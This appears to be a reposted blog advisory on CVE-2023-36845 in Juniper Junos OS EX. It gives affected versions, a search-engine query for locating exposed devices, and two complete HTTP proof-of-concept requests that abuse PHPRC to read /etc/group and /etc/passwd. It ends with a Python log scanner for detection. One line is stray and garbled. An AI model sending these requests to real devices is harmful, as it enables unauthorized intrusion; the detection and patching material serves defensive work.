Juniper Networks Junos OS EX Remote Command Execution Vulnerability (CVE-2023-36845)

Disclaimer: Please do not use the techniques in this article for illegal testing. Any direct or indirect consequences and losses caused by the dissemination and use of the information or tools provided in this article are the responsibility of the user. The author of the article bears no responsibility for any adverse consequences. This article is for educational purposes only.

1: Vulnerability description

Juniper Networks Junos OS EX is the network operating system that Juniper Networks, a US company, develops for its own hardware. It contains a PHP environment variable manipulation vulnerability affecting Juniper SRX firewalls and EX switches. An attacker can achieve remote command execution without authorization.

2: Affected versions

All versions < 21.4R3-S5
22.1 versions < 22.1R3-S4
22.2 versions < 22.2R3-S2
22.3 versions < 22.3R2-S2, 22.3R3-S1
22.4 versions < 22.4R2-S1, 22.4R3
23.2 versions < 23.2R1-S1, 23.2R2

3: Cyberspace search engine query

fofa: title="Juniper Web Device Manager"

4: Vulnerability reproduction

1. Manual reproduction

Reproduction POC 1

POST /?PHPRC=/dev/fd/0 HTTP/1.1
Host: 127.0.0.1
Cache-Control: max-age=0
Sec-Ch-Ua: "-Not.A/Brand";v="8", "Chromium";v="102"
Sec-Ch-Ua-Mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9


auto_prepend_file="/etc/group"

Reproduction POC 2

POST /?PHPRC=/dev/fd/0 HTTP/1.1
Host: 127.0.0.1
Cache-Control: max-age=0
Sec-Ch-Ua: "-Not.A/Brand";v="8", "Chromium";v="102"
Sec-Ch-Ua-Mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9


auto_prepend_file="/etc/passwd"


2. Automated reproduction

Run it through the Xiaolong POC detection tool

Another touching piece of azuki red

7: Repair suggestions

Upgrade to a fixed version
Block sensitive code execution
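
For detection, the requests in section 4 are recognizable by a query parameter that sets PHPRC. The script below is an added example, not code from the original article or from Juniper; it scans access-log lines for that parameter. The log format, the sample lines and all function names are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample lines in common-log style (assumed format, not from a real device).
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Oct/2023:09:12:01 +0000] "POST /?PHPRC=/dev/fd/0 HTTP/1.1" 200 512',
    '198.51.100.7 - - [10/Oct/2023:09:12:05 +0000] "POST /?%50HPRC=%2Fdev%2Ffd%2F0 HTTP/1.1" 200 498',
    '192.0.2.10 - - [10/Oct/2023:09:13:40 +0000] "GET /index.php?lang=en&page=PHPRC HTTP/1.1" 200 2048',
    '192.0.2.10 - - [10/Oct/2023:09:14:02 +0000] "GET /?a=1&PHPRC=/tmp/x.ini HTTP/1.1" 404 0',
]

REQUEST_RE = re.compile(
    r'^(?P<src>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
# Query parameter named in the article's requests; compared case-insensitively on purpose.
SUSPECT_PARAMS = {"PHPRC"}


def suspicious_params(target):
    """Return (name, value) pairs in a request target that set a suspect variable."""
    # parse_qsl percent-decodes names and values, so an encoded name (%50HPRC) still matches.
    pairs = parse_qsl(urlsplit(target).query, keep_blank_values=True)
    return [(k, v) for k, v in pairs if k.strip().upper() in SUSPECT_PARAMS]


def scan(lines):
    """Return one finding per suspect parameter found in the given log lines."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.match(line)
        if not match:
            continue  # not a request line in the assumed format
        for _name, value in suspicious_params(match["target"]):
            findings.append({
                "line": number,
                "src": match["src"],
                "method": match["method"],
                "status": int(match["status"]),
                "value": value,
                # /dev/fd/0 is stdin: the request body is being offered as PHP configuration
                "reads_body": value.startswith("/dev/fd/"),
            })
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A parameter value that merely contains the string PHPRC (third sample line) is not flagged; only a parameter whose name decodes to PHPRC is.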

Origin blog.csdn.net/holyxp/article/details/133741502